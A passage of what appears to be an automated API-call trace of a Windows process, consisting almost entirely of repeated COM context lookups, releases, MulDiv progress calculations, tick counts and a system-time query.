ppv=0x18e8e8 | out: ppv=0x18e8e8*=0x371480) returned 0x0 [0014.384] IUnknown:Release (This=0x371480) returned 0x1 [0014.384] ISystemDebugEventFire:IsActive (This=0x38f8a0) returned 0x1 [0014.384] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18e888 | out: ppv=0x18e888*=0x371480) returned 0x0 [0014.385] IUnknown:Release (This=0x371480) returned 0x1 [0014.385] GetCurrentThreadId () returned 0x9ac [0014.392] GetSystemTime (in: lpSystemTime=0x18abc0 | out: lpSystemTime=0x18abc0*(wYear=0x7e1, wMonth=0xb, wDayOfWeek=0x2, wDay=0x7, wHour=0x13, wMinute=0x18, wSecond=0x14, wMilliseconds=0x13d)) [0014.395] _tzset () [0014.406] localtime (param_1=0x18a880) returned 0x2bc070 [0014.406] GetTimeZoneInformation (in: lpTimeZoneInformation=0x18a8b0 | out: lpTimeZoneInformation=0x18a8b0) returned 0x2 [0014.406] _vsnwprintf (in: _Buffer=0x18a820, _BufferCount=0xff, _Format="%s %s %d ", _ArgList=0x18a7e8 | out: _Buffer="Wed Nov 8 ") returned 10 [0014.433] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.438] MulDiv (nNumber=422, nNumerator=100, nDenominator=517) returned 82 [0014.438] IUnknown:Release (This=0x371480) returned 0x1 [0014.438] GetTickCount () returned 0x137b2 [0014.442] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.442] MulDiv (nNumber=444, nNumerator=100, nDenominator=613) returned 72 [0014.442] IUnknown:Release (This=0x371480) returned 0x1 [0014.442] GetTickCount () returned 0x137c2 [0014.442] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.443] MulDiv (nNumber=444, nNumerator=100, nDenominator=687) returned 65 [0014.443] IUnknown:Release (This=0x371480) returned 0x1 [0014.443] GetTickCount () returned 0x137c2 [0014.443] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.443] MulDiv (nNumber=444, nNumerator=100, nDenominator=761) returned 58 [0014.443] IUnknown:Release (This=0x371480) returned 0x1 [0014.443] GetTickCount () returned 0x137c2 [0014.443] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.443] MulDiv (nNumber=444, nNumerator=100, nDenominator=835) returned 53 [0014.443] IUnknown:Release (This=0x371480) returned 0x1 [0014.443] GetTickCount () returned 0x137c2 [0014.444] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.444] MulDiv (nNumber=444, nNumerator=100, nDenominator=909) returned 49 [0014.444] IUnknown:Release (This=0x371480) returned 0x1 [0014.444] GetTickCount () returned 0x137c2 [0014.444] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.444] MulDiv (nNumber=444, nNumerator=100, nDenominator=983) returned 45 [0014.444] IUnknown:Release (This=0x371480) returned 0x1 [0014.444] GetTickCount () returned 0x137c2 [0014.444] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.444] MulDiv (nNumber=444, nNumerator=100, nDenominator=1057) returned 42 [0014.444] IUnknown:Release (This=0x371480) returned 0x1 [0014.444] GetTickCount () returned 0x137c2 [0014.445] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.445] MulDiv (nNumber=444, nNumerator=100, nDenominator=1131) returned 39 [0014.445] IUnknown:Release (This=0x371480) returned 0x1 [0014.445] GetTickCount () returned 0x137c2 [0014.445] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.445] MulDiv (nNumber=444, nNumerator=100, nDenominator=1205) returned 37 [0014.445] IUnknown:Release (This=0x371480) returned 0x1 [0014.445] GetTickCount () returned 0x137c2 [0014.445] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.445] MulDiv (nNumber=444, nNumerator=100, nDenominator=1279) returned 35 [0014.445] IUnknown:Release (This=0x371480) returned 0x1 [0014.445] GetTickCount () returned 0x137c2 [0014.446] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.446] MulDiv (nNumber=444, nNumerator=100, nDenominator=1353) returned 33 [0014.446] IUnknown:Release (This=0x371480) returned 0x1 [0014.446] GetTickCount () returned 0x137c2 [0014.446] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.446] MulDiv (nNumber=444, nNumerator=100, nDenominator=1427) returned 31 [0014.446] IUnknown:Release (This=0x371480) returned 0x1 [0014.446] GetTickCount () returned 0x137c2 [0014.446] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.446] MulDiv (nNumber=444, nNumerator=100, nDenominator=1501) returned 30 [0014.446] IUnknown:Release (This=0x371480) returned 0x1 [0014.446] GetTickCount () returned 0x137c2 [0014.447] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.447] MulDiv (nNumber=444, nNumerator=100, nDenominator=1575) returned 28 [0014.447] IUnknown:Release (This=0x371480) returned 0x1 [0014.447] GetTickCount () returned 0x137c2 [0014.447] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.447] MulDiv (nNumber=444, nNumerator=100, nDenominator=1649) returned 27 [0014.447] IUnknown:Release (This=0x371480) returned 0x1 [0014.447] GetTickCount () returned 0x137c2 [0014.448] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.448] MulDiv (nNumber=444, nNumerator=100, nDenominator=1723) returned 26 [0014.448] IUnknown:Release (This=0x371480) returned 0x1 [0014.448] GetTickCount () returned 0x137c2 [0014.448] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.448] MulDiv (nNumber=444, nNumerator=100, nDenominator=1797) returned 25 [0014.448] IUnknown:Release (This=0x371480) returned 0x1 [0014.448] GetTickCount () returned 0x137c2 [0014.449] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.449] MulDiv (nNumber=444, nNumerator=100, nDenominator=1871) returned 24 [0014.449] IUnknown:Release (This=0x371480) returned 0x1 [0014.449] GetTickCount () returned 0x137c2 [0014.449] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.449] MulDiv (nNumber=444, nNumerator=100, nDenominator=1945) returned 23 [0014.449] IUnknown:Release (This=0x371480) returned 0x1 [0014.449] GetTickCount () returned 0x137c2 [0014.449] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.449] MulDiv (nNumber=444, nNumerator=100, nDenominator=2019) returned 22 [0014.449] IUnknown:Release (This=0x371480) returned 0x1 [0014.449] GetTickCount () returned 0x137c2 [0014.449] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.449] MulDiv (nNumber=444, nNumerator=100, nDenominator=2093) returned 21 [0014.449] IUnknown:Release (This=0x371480) returned 0x1 [0014.449] GetTickCount () returned 0x137c2 [0014.450] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.450] MulDiv (nNumber=444, nNumerator=100, nDenominator=2167) returned 20 [0014.450] IUnknown:Release (This=0x371480) returned 0x1 [0014.450] GetTickCount () returned 0x137c2 [0014.450] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.450] MulDiv (nNumber=444, nNumerator=100, nDenominator=2241) returned 20 [0014.450] IUnknown:Release (This=0x371480) returned 0x1 [0014.450] GetTickCount () returned 0x137c2 [0014.450] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.450] MulDiv (nNumber=444, nNumerator=100, nDenominator=2315) returned 19 [0014.450] IUnknown:Release (This=0x371480) returned 0x1 [0014.450] GetTickCount () returned 0x137c2 [0014.451] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.451] MulDiv (nNumber=444, nNumerator=100, nDenominator=2389) returned 19 [0014.451] IUnknown:Release (This=0x371480) returned 0x1 [0014.451] GetTickCount () returned 0x137c2 [0014.451] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.451] MulDiv (nNumber=444, nNumerator=100, nDenominator=2463) returned 18 [0014.451] IUnknown:Release (This=0x371480) returned 0x1 [0014.451] GetTickCount () returned 0x137c2 [0014.451] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.451] MulDiv (nNumber=444, nNumerator=100, nDenominator=2537) returned 18 [0014.451] IUnknown:Release (This=0x371480) returned 0x1 [0014.451] GetTickCount () returned 0x137c2 [0014.452] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.452] MulDiv (nNumber=444, nNumerator=100, nDenominator=2611) returned 17 [0014.452] IUnknown:Release (This=0x371480) returned 0x1 [0014.452] GetTickCount () returned 0x137c2 [0014.452] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.452] MulDiv (nNumber=444, nNumerator=100, nDenominator=2685) returned 17 [0014.452] IUnknown:Release (This=0x371480) returned 0x1 [0014.452] GetTickCount () returned 0x137c2 [0014.452] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.452] MulDiv (nNumber=444, nNumerator=100, nDenominator=2759) returned 16 [0014.452] IUnknown:Release (This=0x371480) returned 0x1 [0014.452] GetTickCount () returned 0x137c2 [0014.453] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.453] MulDiv (nNumber=444, nNumerator=100, nDenominator=2833) returned 16 [0014.453] IUnknown:Release (This=0x371480) returned 0x1 [0014.453] GetTickCount () returned 0x137c2 [0014.453] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.453] MulDiv (nNumber=444, nNumerator=100, nDenominator=2907) returned 15 [0014.453] IUnknown:Release (This=0x371480) returned 0x1 [0014.453] GetTickCount () returned 0x137c2 [0014.453] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.454] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.454] MulDiv (nNumber=882, nNumerator=100, nDenominator=3566) returned 25 [0014.454] IUnknown:Release (This=0x371480) returned 0x1 [0014.454] GetTickCount () returned 0x137c2 [0014.455] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.455] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.455] MulDiv (nNumber=882, nNumerator=100, nDenominator=3787) returned 23 [0014.455] IUnknown:Release (This=0x371480) returned 0x1 [0014.455] GetTickCount () returned 0x137c2 [0014.456] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.456] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.457] MulDiv (nNumber=882, nNumerator=100, nDenominator=4008) returned 22 [0014.457] IUnknown:Release (This=0x371480) returned 0x1 [0014.457] GetTickCount () returned 0x137c2 [0014.457] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.458] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.458] MulDiv (nNumber=882, nNumerator=100, nDenominator=4229) returned 21 [0014.458] IUnknown:Release (This=0x371480) returned 0x1 [0014.458] GetTickCount () returned 0x137d1 [0014.458] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.459] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.459] MulDiv (nNumber=882, nNumerator=100, nDenominator=4450) returned 20 [0014.459] IUnknown:Release (This=0x371480) returned 0x1 [0014.459] GetTickCount () returned 0x137d1 [0014.459] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.460] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.460] MulDiv (nNumber=882, nNumerator=100, nDenominator=4671) returned 19 [0014.460] IUnknown:Release (This=0x371480) returned 0x1 [0014.460] GetTickCount () returned 0x137d1 [0014.460] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.460] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.460] MulDiv (nNumber=882, nNumerator=100, nDenominator=4892) returned 18 [0014.460] IUnknown:Release (This=0x371480) returned 0x1 [0014.461] GetTickCount () returned 0x137d1 [0014.461] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.461] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.461] MulDiv (nNumber=882, nNumerator=100, nDenominator=5113) returned 17 [0014.461] IUnknown:Release (This=0x371480) returned 0x1 [0014.461] GetTickCount () returned 0x137d1 [0014.462] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.462] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.462] MulDiv (nNumber=882, nNumerator=100, nDenominator=5334) returned 17 [0014.462] IUnknown:Release (This=0x371480) returned 0x1 [0014.462] GetTickCount () returned 0x137d1 [0014.462] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.463] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.463] MulDiv (nNumber=882, nNumerator=100, nDenominator=5555) returned 16 [0014.463] IUnknown:Release (This=0x371480) returned 0x1 [0014.463] GetTickCount () returned 0x137d1 [0014.463] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.464] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.464] MulDiv (nNumber=882, nNumerator=100, nDenominator=5776) returned 15 [0014.464] IUnknown:Release (This=0x371480) returned 0x1 [0014.464] GetTickCount () returned 0x137d1 [0014.464] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.466] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.467] MulDiv (nNumber=1758, nNumerator=100, nDenominator=7019) returned 25 [0014.467] IUnknown:Release (This=0x371480) returned 0x1 [0014.467] GetTickCount () returned 0x137d1 [0014.467] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.469] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.469] MulDiv (nNumber=1758, nNumerator=100, nDenominator=7386) returned 24 [0014.469] IUnknown:Release (This=0x371480) returned 0x1 [0014.469] GetTickCount () returned 0x137d1 [0014.470] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.471] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18cba8 | out: ppv=0x18cba8*=0x371480) returned 0x0 [0014.471] MulDiv (nNumber=1758, nNumerator=100, nDenominator=7753) returned 23 [0014.471] IUnknown:Release (This=0x371480) returned 0x1 [0014.471] GetTickCount () returned 0x137d1 [0014.472] CoGetObjectContext (in: riid=0x7fef3086350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, 